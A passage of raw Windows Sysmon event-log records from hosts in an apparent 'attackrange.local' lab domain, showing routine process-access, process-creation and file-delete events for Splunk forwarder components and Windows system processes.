Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105081Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.038{54715871-7158-60CA-3513-00000000CF01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151689Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.787{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A432B0D65511AFD9FCB335A9D50FD1,SHA256=08EDC278F068AB687A701C0DC23AFBA80F71184029BEB0E9E2C689EFBA47251C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151688Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7158-60CA-250D-00000000D101}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151687Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151686Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151685Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151684Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151683Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7158-60CA-250D-00000000D101}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151682Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.702{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7158-60CA-250D-00000000D101}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151681Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:04.703{39BD8DE3-7158-60CA-250D-00000000D101}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151700Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.808{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F2D622340A433B3780426933376F539,SHA256=44F647BFC65BBD176012AC7F339BF5E5D1E41234311300B048D201C1DCA8D429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151699Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.706{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC58D20CD6E47AC112DFE66CD017ACBC,SHA256=10571503E2BD2B8D5D071CAAF28DC0268372158D0D9175CD221F85D1EAABE3E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151698Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.609{39BD8DE3-7159-60CA-260D-00000000D101}5544640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151697Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7159-60CA-260D-00000000D101}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151696Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151695Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151694Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151693Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151692Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7159-60CA-260D-00000000D101}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151691Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.386{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7159-60CA-260D-00000000D101}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151690Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.387{39BD8DE3-7159-60CA-260D-00000000D101}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105092Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:06.506{54715871-FD18-60C9-1000-00000000CF01}380NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6105A5BEFC6DC7FA59D4B0DB629128C8,SHA256=2F87131097C92BEDF9F9BF5BF0973AF73A9A3CA28DC91E8691C9ACD040C7B978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105091Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:06.129{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EE3FCA97016CB60FACB8B712C143325,SHA256=DD76C9B2762E71A85695DF646A79FF12C347924D2E399564252E73CE0F9E195B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151709Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.825{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E7D0D2A1246FC61E9AA0825CB0C9B5,SHA256=97B744DCDB43C6F42B28FF76A48941FACEB87BA25264ACF4776EC87CC5D284D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151708Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-715A-60CA-270D-00000000D101}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151707Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151706Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151705Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151704Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151703Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-715A-60CA-270D-00000000D101}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151702Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 